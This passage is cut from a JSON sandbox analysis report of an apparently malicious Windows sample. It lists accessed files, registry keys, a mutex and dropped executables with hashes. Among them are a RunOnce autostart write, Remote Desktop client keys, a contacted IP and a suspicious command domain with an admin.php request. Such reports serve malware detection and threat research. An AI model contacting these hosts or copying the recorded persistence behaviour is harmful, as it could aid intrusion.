"C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", "hashes": [], "norm_filename": "c:\\program files (x86)\\msbuild\\microsoft.office.infopath.targets", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\MSBuild\\none.exe", "hashes": [], "norm_filename": "c:\\program files (x86)\\msbuild\\none.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe", "hashes": [], "norm_filename": "c:\\program files (x86)\\mozilla maintenance service\\maintenanceservice.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe", "hashes": [], "norm_filename": "c:\\program files (x86)\\mozilla maintenance service\\uninstall.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAClientPkg.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaclientpkg.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaproject.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\vstaclientpkgui.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAProjectUI.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\vstaprojectui.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.adapter.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.AddInManager.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.addinmanager.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.comrpcchannel.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.DesignTime.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.designtime.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\System.AddIn.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\system.addin.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\privateassemblies\\microsoft.visualstudio.tools.applications.project.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\authzax.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\bcslaunch.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\dgrmlnch.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\grooveex.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\ieawsdc.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\INLAUNCH.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\inlaunch.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHEV.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\msohev.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.EXE", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\msohtmed.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAME.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\name.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMECONTROLPROXY.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\namecontrolproxy.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAMEEXT.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\nameext.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPAUTHZ.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\npauthz.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPSPWRAP.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\npspwrap.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\oisctrl.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\oisctrl.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\OLKFSTUB.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\olkfstub.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIE.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\onbttnie.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONBttnIELinkedNotes.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\onbttnielinkednotes.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\OneNoteSyncPC.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\onenotesyncpc.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONLNTCOMLIB.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\onlntcomlib.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\OWSSUPP.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\owssupp.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\PPSLAX.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\ppslax.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSCOPY.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\stscopy.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSUPLD.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\stsupld.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVB.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\umlvb.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVC60.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\umlvc60.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVS.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\umlvs.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\URLREDIR.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\urlredir.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWDWG.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\vviewdwg.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\VVIEWER.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\vviewer.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\1033\\bhointl.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\1033\\dl_res.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\1033\\grooveintlresource.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\1033\\mapishellr.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OCLTINT.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\1033\\ocltint.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OWSHLP10.CHM", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\1033\\owshlp10.chm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUCRES.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\1033\\stsucres.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUPLD.INTL.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\1033\\stsupld.intl.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVBRES.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvbres.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVC60R.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvc60r.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVSUI.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvsui.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VBAOWS10.CHM", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\1033\\vbaows10.chm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft office\\office14\\1033\\vviewres.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msolap100.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msolui100.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\artistsstatistics.exe", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\artistsstatistics.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\trusted.libraries", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\trusted.libraries", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\awt.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\axbridge.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\dcpr.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\dcpr.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\decora-sse.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\decora-sse.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\deploy.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\deploy.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_shmem.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\dt_shmem.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_socket.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\dt_socket.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\eula.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\eula.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\fontmanager.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\fontmanager.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\fxplugins.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\fxplugins.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\glass.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\glass.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YBZ8BT~1\\AppData\\Local\\Temp\\tmp81BC.tmp.bat", "hashes": [], "norm_filename": "c:\\users\\ybz8bt~1\\appdata\\local\\temp\\tmp81bc.tmp.bat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32", "hashes": [], "norm_filename": "c:\\windows\\system32", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\documents", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "Default.rdp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\default.rdp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_ERROR_HANDLE", "hashes": [], "norm_filename": "std_error_handle", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 } ], "ips": [ { "ip_address": "54.205.205.46", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access", "delete" ], "type": "mutex_artifact", "version": 1 } ], "registry": [ { "operations": [ "read", "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\VBA\\7.0\\Common", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "type": "registry_artifact", "version": 1 }, { "operations": [ "write", "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "write", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [ { "operations": [], "type": "url_artifact", "url": "weekendfakc.top", "version": 1 }, { "operations": [ "get" ], "type": "url_artifact", "url": "weekendfakc.top/admin.php?f=2", "version": 1 } ], "version": 1 }, "extracted_files": [ { "archive_path": "extracted_files/86ec6897a9efbe17cefae3ebe8062a3153bccd6d", "file_type": "created_file", "id": "file_2", "md5_hash": "8f74824751359ce6359876e422c1f8c1", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp13684.exe", "sha1_hash": "86ec6897a9efbe17cefae3ebe8062a3153bccd6d", "sha256_hash": "a5aac8cb7ed1e315f16975522723605b3cf27c8676f000be3d65ad6a56daf014", "size": 215184, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/86ec6897a9efbe17cefae3ebe8062a3153bccd6d", "file_type": "created_file", "id": "file_4", "md5_hash": "8f74824751359ce6359876e422c1f8c1", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\temp13684.exe", "sha1_hash": "86ec6897a9efbe17cefae3ebe8062a3153bccd6d", "sha256_hash": "a5aac8cb7ed1e315f16975522723605b3cf27c8676f000be3d65ad6a56daf014", "size": 215184, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_3", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\temp13684.exe", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", 